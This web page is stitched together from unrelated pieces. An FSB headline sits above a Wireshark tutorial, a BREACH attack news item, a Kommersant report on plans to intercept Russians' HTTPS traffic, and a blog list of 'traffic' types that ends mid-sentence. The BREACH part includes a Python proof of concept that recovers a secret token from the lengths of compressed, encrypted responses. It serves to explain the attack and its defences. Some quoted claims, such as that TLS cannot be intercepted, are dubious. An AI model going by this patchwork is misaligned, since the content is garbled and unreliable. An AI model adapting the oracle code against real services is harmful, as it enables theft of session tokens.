
How FSB decrypts traffic. FSB, the Ministry of Communications and the Ministry of Industry and Trade are going to decrypt all the traffic of Russians Targeted traffic or thematic

Wireshark is a powerful network analyzer that lets you examine the traffic passing through a network interface of your computer. It is useful for finding and resolving network problems and for debugging web applications, network programs and sites. Wireshark shows the full contents of every packet at every protocol layer, so it also helps you understand how the network works at a low level.

All packets are captured in real time and presented in an easy-to-read form. The program has a very powerful filtering system, colour highlighting and other features that help you find the packets you need. In this tutorial we look at how to use Wireshark to analyze traffic. The developers have moved to the 2.x branch of Wireshark, which brought many changes and improvements, especially to the interface; that is the version used in this article.

Before looking at ways to analyze traffic, it is worth reviewing in more detail what the program can do and which protocols it handles. The main features are:

  • capturing packets in real time from wired and other kinds of network interfaces, as well as reading them from a file;
  • supported capture interfaces include Ethernet, IEEE 802.11, PPP and local virtual (loopback) interfaces;
  • packets can be filtered by a wide range of parameters;
  • known protocols (TCP, HTTP, FTP, DNS, ICMP and so on) are highlighted in the packet list in different colours;
  • capture and analysis of VoIP calls;
  • decryption of HTTPS traffic, provided you have the server's private key (only works for RSA key exchange, not for forward-secret ciphersuites) or a log of the TLS session keys (the SSLKEYLOGFILE mechanism supported by Firefox and Chrome);
  • decryption of WEP and WPA/WPA2 wireless traffic, provided you have the key and, for WPA, the captured four-way handshake;
  • network load statistics;
  • viewing packet contents at every network layer;
  • timestamps for every packet.

The program has many other features, but these are the main ones likely to interest you.

How to use Wireshark

I'll assume you already have the program installed; if not, it is available from the official repositories. On Ubuntu, type:

sudo apt install wireshark

After installation the program appears in the distribution's main menu. Capturing packets requires elevated privileges, so the old advice is to run Wireshark as root, either from the main menu or from a terminal through your desktop's graphical su wrapper. Don't do that: Wireshark's dissectors are a large parsing codebase that has had many memory-safety bugs, and running it as root means a single malicious packet on the wire can compromise the whole machine. Instead, give only the capture helper (dumpcap) the capture capabilities and run the GUI as your normal user. On Debian and Ubuntu this is done with:

sudo dpkg-reconfigure wireshark-common
sudo usermod -aG wireshark $USER

Answer "yes" when asked whether non-superusers should be able to capture packets, then log out and back in so that the new group membership takes effect.

The main window of the program is divided into three parts: the first column lists the network interfaces available for capture, the second offers options for opening capture files, and the third is help.

Network traffic analysis

To start capturing, select a network interface, for example eth0, and click the Start button.

A new window then opens showing the stream of packets passing through the interface. It is divided into several parts:

  • the top part holds the menus and toolbars;
  • the packet list shows the stream of captured packets that you will analyze;
  • the packet details pane below it shows the contents of the selected packet, broken down by protocol layer (frame, Ethernet, IP, TCP/UDP, application protocol);
  • the packet bytes pane at the very bottom shows the raw bytes of the selected packet in hexadecimal and as text.

Click on any packet to examine its contents:

Here we see a DNS query packet used to look up a site's IP address: the query carries the domain name, and the response packet repeats our question together with the answer.
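To make concrete what the packet details pane is showing for this DNS exchange, here is an added example (not code from the original tutorial): a small Python dissector that walks a frame the way Wireshark does, Ethernet, then IPv4, then UDP, then DNS, and exposes each field under its Wireshark display-filter name such as ip.ttl or udp.dstport. The two frames are constructed inline; the MAC and IP addresses, the transaction ID and the answer are made up, and the IP/UDP checksums are left at zero (Wireshark would flag them, which does not affect dissection).

```python
"""Layer-by-layer dissection of a DNS query and its answer, mirroring
Wireshark's packet details pane.  Added example; the frames below are
constructed by hand and every address in them is made up."""
import struct
from typing import Dict, List, Tuple


def parse_ethernet(frame: bytes) -> Tuple[Dict, bytes]:
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    mac = lambda m: ":".join(f"{b:02x}" for b in m)
    return {"dst": mac(dst), "src": mac(src), "type": ethertype}, frame[14:]


def parse_ipv4(data: bytes) -> Tuple[Dict, bytes]:
    (ver_ihl, _tos, total_len, _ident, _frag, ttl, proto, _csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", data[:20])
    ihl = (ver_ihl & 0x0F) * 4                      # header length in bytes
    hdr = {"version": ver_ihl >> 4, "ttl": ttl, "proto": proto,
           "src": ".".join(map(str, src)), "dst": ".".join(map(str, dst))}
    return hdr, data[ihl:total_len]                 # payload, trailing padding dropped


def parse_udp(data: bytes) -> Tuple[Dict, bytes]:
    srcport, dstport, length, _csum = struct.unpack("!HHHH", data[:8])
    return {"srcport": srcport, "dstport": dstport, "length": length}, data[8:length]


def read_name(msg: bytes, off: int) -> Tuple[str, int]:
    """Decode a DNS name, following RFC 1035 compression pointers (0xC0xx)."""
    labels: List[str] = []
    end = None                                      # offset just past the name as written
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                       # pointer to an earlier copy of the name
            if end is None:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels), end if end is not None else off


def parse_dns(msg: bytes) -> Dict:
    tid, flags, qdcount, ancount, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off, questions, answers = 12, [], []
    for _ in range(qdcount):
        name, off = read_name(msg, off)
        qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append({"name": name, "type": qtype})
    for _ in range(ancount):
        name, off = read_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        value = ".".join(map(str, rdata)) if rtype == 1 and rdlen == 4 else rdata.hex()
        answers.append({"name": name, "type": rtype, "ttl": ttl, "data": value})
    return {"id": tid, "is_response": bool(flags & 0x8000), "rcode": flags & 0xF,
            "questions": questions, "answers": answers}


def dissect(frame: bytes) -> Dict:
    """One dict per layer, keyed like Wireshark's protocol names."""
    eth, rest = parse_ethernet(frame)
    ip, rest = parse_ipv4(rest)
    if ip["proto"] != 17:
        raise ValueError("only UDP is handled in this example")
    udp, rest = parse_udp(rest)
    return {"eth": eth, "ip": ip, "udp": udp, "dns": parse_dns(rest)}


def field(pkt: Dict, name: str):
    """Look up a field by its display-filter name, e.g. field(pkt, 'ip.ttl')."""
    layer, key = name.split(".", 1)
    return pkt[layer][key]


# --- constructed sample frames (made-up addresses, zero checksums) ---------
def _name(s: str) -> bytes:
    return b"".join(bytes([len(l)]) + l.encode() for l in s.split(".")) + b"\x00"


def _frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, ttl, payload) -> bytes:
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0x1234, 0x4000,
                     ttl, 17, 0, bytes(src_ip), bytes(dst_ip)) + udp
    return bytes(dst_mac) + bytes(src_mac) + b"\x08\x00" + ip


CLIENT_MAC, ROUTER_MAC = [0x02] * 6, [0x04] * 6
CLIENT_IP, RESOLVER_IP = (192, 168, 1, 10), (192, 168, 1, 1)
QUESTION = _name("example.com") + struct.pack("!HH", 1, 1)          # type A, class IN
QUERY_FRAME = _frame(CLIENT_MAC, ROUTER_MAC, CLIENT_IP, RESOLVER_IP, 51234, 53, 64,
                     struct.pack("!HHHHHH", 0xBEEF, 0x0100, 1, 0, 0, 0) + QUESTION)
ANSWER = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, 4) + bytes([93, 184, 216, 34])
RESPONSE_FRAME = _frame(ROUTER_MAC, CLIENT_MAC, RESOLVER_IP, CLIENT_IP, 53, 51234, 57,
                        struct.pack("!HHHHHH", 0xBEEF, 0x8180, 1, 1, 0, 0) + QUESTION + ANSWER)

if __name__ == "__main__":
    for f in (QUERY_FRAME, RESPONSE_FRAME):
        p = dissect(f)
        print(field(p, "ip.src"), "->", field(p, "ip.dst"),
              "ttl", field(p, "ip.ttl"), p["dns"])
```

The answer record's name is a compression pointer back to the question (`\xc0\x0c`), which is why the response "contains our question as well as the answer" in the packet details: the resolver does not repeat the name, it refers to offset 12 in the same message.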

For more convenient viewing you can open a packet in a separate window by double-clicking on its entry:

Wireshark Filters

Sorting through packets by hand to find the ones you need is very inconvenient, especially on a busy link, so it is better to use filters. There is a dedicated filter line under the menu; you can click Expression to open the filter builder, but there are a great many fields, so we will cover only the most basic ones:

  • ip.dst - destination IP address;
  • ip.src - source IP address;
  • ip.addr - source or destination IP address;
  • ip.proto - the IP protocol number (6 for TCP, 17 for UDP, 1 for ICMP);
  • tcp.dstport - destination port;
  • tcp.srcport - source port;
  • ip.ttl - the packet's time to live, which gives a rough idea of how many hops it has traversed;
  • http.request.uri - the requested URI.

The following operators express the relation between a field and a value:

  • == - equal;
  • != - not equal;
  • < - less than;
  • > - greater than;
  • <= - less than or equal to;
  • >= - greater than or equal to;
  • matches - the field matches a regular expression;
  • contains - the field contains the given substring.

Several expressions are combined with:

  • && - both expressions must be true for the packet;
  • || - at least one of the expressions must be true.

Now let's look at a few example filters and work through the relations.

First, let's show all packets sent to 194.67.215.125. Type the string in the filter field and click Apply. For convenience, filters can be saved with the Save button:

ip.dst == 194.67.215.125

To see not only the packets sent to this host but also those received from it, combine two conditions (ip.addr == 194.67.215.125 is the shorthand for the same thing):

ip.dst == 194.67.215.125 || ip.src == 194.67.215.125

We can also pick out transfers of large files:

http.content_length > 5000

Filtering on Content-Type lets us select all images that were transferred, that is, the packets whose content type contains the word image:

http.content_type contains "image"

To clear the filter, click Clear. Often you don't know in advance all the details needed for a filter and just want to explore the traffic. In that case you can add any packet field as a column and see its value for every packet in the packet list.

For example, to show a packet's TTL (time to live) as a column, open the packet details, find the field in the IP section, open its context menu and choose Apply as Column:

In the same way you can build a filter from any field. Select it, open the context menu and choose Apply as Filter or Prepare as Filter, then Selected to show only packets with that value, or Not Selected to exclude them:

The field and its value are applied, or, in the second case, simply placed in the filter line for editing:

In this way any packet field or column can be turned into a filter. You can also filter protocols with much simpler conditions: a protocol name on its own matches every packet that contains that protocol. For example, to see only HTTP and DNS traffic:

http || dns

Another interesting feature is using Wireshark to follow a particular session between the user's computer and the server. To do this, open the packet's context menu and choose Follow TCP Stream.

A window opens containing all the data exchanged between the client and the server, reassembled in order:

Diagnosing network problems with Wireshark

You may be wondering how to use Wireshark 2.0 to find network problems. In the lower left corner of the window there is a round button; clicking it opens the Expert Information window, where Wireshark collects all the error and failure messages it noticed while dissecting the capture:

The window is divided into tabs: Errors, Warnings, Notes and Chats. The program recognizes many network problems (retransmissions, out-of-order segments, checksum errors, malformed packets and so on), and here you can see them at a glance. Display filters work in this window too.

Wireshark traffic analysis

If the connection was not encrypted, it is very easy to see exactly what users downloaded and which files they viewed; the program does a good job of extracting content.

First stop the capture with the red square on the toolbar, then open the menu File -> Export Objects -> HTTP:

HTTP compression, which most sites use to reduce the amount of data transmitted, can become a serious security risk when the site uses HTTPS, say security researchers Dimitris Karakostas and Dionysis Zindros. They improved a long-known attack that speeds up the recovery of secrets from HTTPS traffic, and applied it against block ciphers in an SSL/TLS connection.

The attack, dubbed BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext), exploits the way gzip/DEFLATE compression leaks information about the plaintext through the size of the compressed output. It was first presented in 2013 at the Black Hat USA conference by Angelo Prado, Neal Harris and Yoel Gluck, at that time against SSL/TLS connections using stream ciphers such as RC4.

A demonstration of the new approach to exploitation is implemented in the open-source Rupture framework, presented at the Black Hat Asia conference last week.

During the presentation the researchers demonstrated two successful attacks, on Gmail and on Facebook chat.

To carry out a BREACH attack, the attacker must be able to intercept and modify the victim's network traffic, for example on a Wi-Fi network or through access to ISP equipment. The attacker also needs to find a part of the application that accepts input via URL parameters and reflects that input in a compressed, encrypted response that also contains a secret.

In the case of Gmail, that part was the search feature of the mobile site. When the search is performed by a logged-in user, an authentication token is included in the response, and it is encrypted together with everything else. However, whenever the searched string coincides with a part of the token, the response to the client becomes slightly smaller, because the compressor replaces the repeated string with a back-reference.

By forcing the client to send a large number of such requests, the attacker can guess the authentication token one character at a time.

The Rupture framework injects code into every unencrypted HTTP page the victim's browser loads. The injected code makes the browser issue requests to the vulnerable HTTPS application in the background. This is needed for a successful attack on block ciphers, which pad the ciphertext to a whole number of blocks and so hide the small length differences the attack depends on ("noise"). To remove the noise, the researchers sent the same requests several times in a row and analyzed the differences in the sizes of the responses. They also used parallelization in the browser, which significantly sped up the attack against block ciphers in TLS connections.
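The mechanism in the preceding paragraphs, as an added example (this is not the Rupture framework's code and nothing here comes from the researchers): a stand-in server reflects the search string into a page that also carries a secret token, compresses the page and pads it to the AES block size as TLS in CBC mode would, and the attacker, seeing only the padded lengths, recovers the token character by character. The page layout, the token value, the known text `en=` preceding it in the page and the use of DEFLATE with fixed Huffman codes (Z_FIXED, so that one saved literal is exactly one byte) are my assumptions; real servers use dynamic Huffman codes, and the resulting noise is what Rupture averages out by repeating requests. The padding loop shows the block-alignment trick: the attacker lengthens the request until the response sits right at a block boundary, so the one-byte saving of a correct guess drops a whole 16-byte block.

```python
"""BREACH-style length oracle against a compressed, block-cipher-encrypted
response.  Added example, not the Rupture framework's code.

Assumptions (mine): made-up page and token; DEFLATE with fixed Huffman codes
(Z_FIXED) so a saved literal is exactly one byte.  Real servers use dynamic
Huffman codes, which adds noise that Rupture averages out with repeats."""
import zlib

SECRET = "3f9a1c7"                 # made-up CSRF token (hex digits)
ALPHABET = "0123456789abcdef"
BLOCK = 16                         # AES block size in bytes
# Attacker-controlled padding: characters that occur nowhere else in the page,
# so they never form LZ77 matches and each one costs exactly one literal.
FILLER = "#$%&()*+,-;:@[]^_`{|}!GHJKMNPQVWXYZ"


def render_page(query: str) -> bytes:
    """The vulnerable page: reflected input and the secret are compressed together."""
    parts = ["<html><body><ul>", "<li>Item</li>" * 12, "</ul>",
             "<p>Results for: ", query, "</p>",
             '<a href="/logout?csrftoken=', SECRET, '">Log out</a>',
             "</body></html>"]
    return "".join(parts).encode()


def deflate_length(query: str) -> int:
    """Compressed size of the page for a given query (fixed Huffman, see above)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, 15, 9, zlib.Z_FIXED)
    return len(comp.compress(render_page(query)) + comp.flush())


def ciphertext_length(query: str) -> int:
    """What the network attacker sees: the compressed length rounded up to a
    whole block (TLS CBC always adds at least one padding byte)."""
    return (deflate_length(query) // BLOCK + 1) * BLOCK


def probe(prefix: str, guess: str, pad: int) -> int:
    """One request the injected script forces the victim's browser to make.
    'en=' is the known text that immediately precedes the token in the page."""
    return ciphertext_length("en=" + prefix + guess + FILLER[:pad])


def recover_next_char(prefix: str, max_pad: int = 32):
    """Grow the padding until the responses straddle a block boundary; then the
    one guess that compresses a byte better shows up as a whole block shorter.
    Returns (character, padding length that aligned the boundary)."""
    for pad in range(max_pad):
        lengths = {c: probe(prefix, c, pad) for c in ALPHABET}
        shortest = min(lengths.values())
        winners = [c for c, n in lengths.items() if n == shortest]
        if len(winners) == 1:
            return winners[0], pad
    raise RuntimeError("no padding aligned the response to a block boundary")


def breach(secret_len: int) -> str:
    """Recover the token character by character using only observed lengths."""
    recovered = ""
    for _ in range(secret_len):
        ch, _ = recover_next_char(recovered)
        recovered += ch
    return recovered


if __name__ == "__main__":
    print("recovered token:", breach(len(SECRET)))
```

Each guess costs 16 requests per padding step, and a single run needs no more than a few hundred requests for a seven-character token; the defences are the usual ones: don't compress responses that mix secrets with attacker-controlled input, or bind the token to the request (CSRF tokens that are masked per response, as Django and Rails now do) so that the reflected string can never match it.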

Journalists at Kommersant have learned how government departments envisage implementing the Yarovaya Law in practice.

According to Kommersant, the FSB, the Ministry of Telecom and Mass Communications and the Ministry of Industry and Trade are discussing a set of technical solutions that would allow decrypting, and thus accessing, all Internet traffic of Russians, as the Yarovaya Law requires. The journalists cite information from a top manager at one of the equipment manufacturers, a member of the Presidential Administration (AP) and an unnamed source at an IT company.

“It makes no sense to store exabytes of encrypted Internet traffic: you won't find anything in it. The FSB is in favor of decrypting all traffic in real time and analyzing it by key parameters, say, the word 'bomb', while the ministries insist on decrypting traffic only for those subscribers who attract the attention of law enforcement agencies,” the AP representative told the journalists.

To analyze unencrypted and already decrypted traffic, it is planned to use DPI (Deep Packet Inspection) systems, which many operators already use, for example for URL filtering against the lists of prohibited sites.

Encrypted traffic is what causes difficulties for the agencies. “There is a huge number of sites on the Internet that are not organizers of the dissemination of information and use a secure HTTPS connection,” the publication's sources explain. “Without decrypting the traffic it is not always possible to tell which site the user visited, let alone what he did there.” So one of the options under discussion is to install equipment in operator networks that would in effect perform a MITM (man-in-the-middle) attack:

“For the user this equipment pretends to be the requested site, and for the site it pretends to be the user. So the user establishes an SSL connection with this equipment, and the equipment establishes one with the server the user requested. The equipment decrypts the traffic intercepted from the server and, before sending it on to the user, re-encrypts it with an SSL certificate issued by a Russian certification authority (CA). To keep the user's browser from warning about an insecure connection, the Russian CA must be added to the trusted root certification authorities on the user's computer.”

The journalists write that Ilya Massukh, head of the IT + Sovereignty subgroup under the Presidential Administration, has previously confirmed that there are indeed plans to create such a certification authority. Whether it will be used to implement the Yarovaya Law is still unknown.

Anton Sushkevich, founder of NVision Group and co-owner of the telecommunications equipment manufacturer RDP.RU, has also heard of the proposal to decrypt traffic.

“The two main methods of encryption on the Internet are end-to-end, which is very popular in instant messengers, and SSL certificates, with which about 80% of Internet traffic is encrypted. To accomplish the task set by the Yarovaya Law, that is, to fight terrorism, traffic must be decrypted and analyzed live, not some time later. Organizing a MITM is one of the possible ways,” says Sushkevich.

Kommersant also asked experts for their opinion, and they were skeptical about the scheme described.

“As soon as this fact becomes known, the certificate of such a certification authority will be cut out of every piece of software that handles encrypted traffic in the next update. And rightly so, because the ability to create 'fake' certificates discredits all of e-commerce: all bank cards and the credentials of all users in all systems become interceptable,” explains Denis Neshtun, head of ARSIENTEK.

“MITM works well, and in some places legally, for SSL-based client-server technologies. But people are increasingly abandoning it in favor of TLS, for which MITM cannot be done today. And in the case of end-to-end encryption, on which most instant messengers are built, MITM is simply unrealizable,” says Alexey Lukatsky, Internet security consultant at Cisco.

Recall that under the Yarovaya Law, organizers of the dissemination of information must provide the authorized division of the FSB with the information needed to decode the electronic messages that users receive, transmit, deliver and (or) process.

“Organizers of the dissemination of information,” in turn, are “persons engaged in activities to ensure the functioning of information systems and (or) programs” that are used to “receive, transmit, deliver and (or) process electronic messages of Internet users,” that is, almost any service through which messages pass, whether a messenger or e-mail.

Kommersant's sources believe that “foreign companies simply will not comply with this requirement, and Russian companies may hand over the keys after numerous demands.”

Good day! Today we'll talk about what traffic is. The word is used in many areas, but it comes up especially often on the Internet; in fact, all earning online is built on it.

Traffic is, in essence, movement: activity, moving from one place to another. There can be a lot of it or a little, and it can be fast or slow. The English word traffic itself simply means movement!

Now, why is traffic needed? Each area needs it for its own purposes. In the IT field, for example, it denotes a number of megabytes: if you have them, you can go online, and how many you need to buy depends on whether you want to download a movie, music or something else.

Webmasters need it to earn money, and everyone strives to get as much of this valuable movement to their site as possible!

Types of traffic

Now let's go through all the types of traffic I managed to find!

car traffic

This is the number of vehicles passing a given point. For example, during the lunch break 500 cars can pass along some street in an hour, and that is very heavy car traffic.

Owners of car dealerships sometimes wonder how to attract traffic to the dealership. By this they mean ordinary customers, buyers; to attract them you just need advertising, that's all!

Car traffic has to be measured for various studies. There are both automatic and manual measurement methods.

Road traffic can also indicate the level of pollution in a particular location: the more cars pass there, the greater the accumulation of exhaust gases in that area.

Pedestrian traffic

This kind consists purely of people using zebra crossings. I think animals could be counted here too, since they also sometimes cross at a specially designated place.

Pedestrian traffic is, in essence, people walking across the striped road marking, the zebra crossing!

Sometimes heavy pedestrian traffic can make things difficult for motorists, so there are services that monitor its volume, although in practice I personally have not seen anything like this.

Maritime traffic

This is the movement of various seagoing vessels: boats, ships, steamers and so on. People often search the Internet for this phrase to find out about maritime traffic in real time, and surprisingly there really is a live display on a map online, where you can go and see where the boat you need is!

What is traffic in trading?

This phrase means the number of customers who came to the store and bought something. The same applies to traffic in business: simply people who came, took something and paid money for it.

Traffic is most often sold on the Internet, but it can be sold offline too, for example by recommending a product that is sold in a certain store. For that you need an agreement with the store's owner, and he must know what kind of customer will come from you today; if it works out, the owner pays you a percentage for bringing the buyer!

What is Internet traffic?

On the network this word has two meanings:

  1. A number of megabytes or gigabytes.
  2. The number of visitors to a site.

The first kind, Internet or network traffic, is what you need to go online: a package measured in the units above. Mobile operators very often cap it. For a home computer you can connect wired Internet for a fixed monthly fee, say 400 rubles, and download as many movies, music and other files as you like; the only restriction is the speed according to your tariff, and you pay this amount once a month.

On mobile Internet, for the same money per month you get, for example, 3-5 GB and that's it. If it runs out, either you buy more at a rather unfavorable price or you wait for the period to end. For example, you connected 2 GB on the first of May but used it up by the 7th of the same month; this means that for the remaining 23 days you either sit without Internet, pay extra, or change the tariff.

My Internet traffic is 7 GB per week on the Zabugorishche tariff, MTS Internet for 600 rubles, paid once every seven days at 150 rubles. These conditions suit me quite well, especially since the seven gigabytes are for new users: I connected earlier and can download as much as I want without restrictions at a moderate speed.

The second kind, Internet or web traffic, is the attendance of a resource on the Internet. For example, about 400-450 people a day visit my blog, so I can say that my traffic is four hundred visitors a day!

I think what traffic on the Internet is should now be clear even to dummies!

What is mobile traffic?

In fact, these are the people who came to you from a device, a phone! Some may still ask what traffic in mobile Internet is; well, that is the amount of Internet traffic discussed above.

If you receive a notification that little traffic is left, it means the Internet will be turned off soon. This usually happens when 10 or 50 megabytes remain.

Motivated traffic

This kind means that a person did something at someone's request. For example, you registered in an affiliate program for an online game that pays 20 rubles for every person you bring. So you go to a special service and ask people to register for a reward of 5 rubles; your profit is 15 rubles net. The person got into the game because you asked him to, for money.

Targeted traffic or thematic

I'll explain this option with the example of a VKontakte group or community. Someone created such a group and gathered in it everyone interested in the release of a new iPhone; a lot of people simply want to get one. Let's say 20,000 people gathered. So the author, without thinking twice, went to the market and found a real store with an affiliate program paying 5% (payouts in official stores are usually small), and on top of that found a replica as well, since not everyone can afford the original. He offered the community both options and as a result earned more than 100,000 rubles! Because all these people were interested in buying, they count as targeted or thematic traffic.

Non-targeted traffic, on the other hand, means, for example, that an advertisement for a laptop from DNS (the electronics retailer) is shown to a person who dreams of a computer from MSI. This is essentially a dud, a waste of money, because he won't buy it.

What is doorway traffic?

Let me demonstrate again with an example! There is a lot of competition on the Internet for the sale of almost any product or service, so some people, to get around this obstacle and make money on affiliate programs, go the following way:

  1. Choose a product they want to earn on.
  2. Find a phrase from this niche that is not very competitive but is searched for often.
  3. Create a site with a domain made of exactly this keyword.

As a result, the site is devoted specifically to that product, for example an action camera or a garden hose. If so, the search engine, in particular Yandex, tries to rank it as high as possible; people come in and some of them buy.

In short, doorway traffic comes from a doorway, a site tailored to a specific affiliate program.

Referral traffic

This phrase is surely used by the owners of affiliate programs. They count how many direct sales they made and how many were brought by referral traffic, also known as affiliate traffic.

That is, if you are a partner and drive visitors to the product, the owner of the product will call you a referrer.

Or you could say it is a user who came to the service through someone's referral link and then brought more people to the same project using his own link; those people can in turn be called referral traffic.

Outgoing and incoming

Most often this refers to the Internet tariff on your computer. If you use a program to account for it, or you have a mobile modem, for example from MTS, you have probably noticed that there is a graph there with labels for incoming and outgoing traffic. While surfing the Internet you exchange data with a server on another computer: some of it leaves you, and the other part comes to you in the form of software, films, pictures, music and so on.

Video traffic

These are, in essence, user visits through video content. For example, you can put links under a video on YouTube or embed links in the clip itself. Active and popular YouTubers are able to bring a huge number of targeted users!

Search traffic or organic

That is, traffic from search engines! Say a person is looking for a flash drive and the search engine returns a lot of sites; if he visits any of them, that visitor counts as organic for the site. Such visits can come from different search engines, for example Yandex, Google, Mail.ru and so on.

Direct traffic

I'll start straight away with an example. You have a friend who recently bought a juicer in an online store. The store gave him a 20% discount and even threw in a set of cups! Looking at your friend, you also want to buy something in this store during the promotion, so you ask him for the exact address. He gives it to you, and you go to the site directly, without any intermediary: you type the address and land on the project's home page. This means you have become direct traffic for this store.

Traffic from context

Many people trying to sell their services or products use contextual advertising on the Internet, the ads you have probably seen while reading articles online.

If a person clicks on an ad in the text and goes to the product, that is traffic from context!

What is fraudulent traffic?

This variety means traffic that is not quite clean. The English word fraud means deception. For advertisers this type of visit means a loss of money. How can this happen?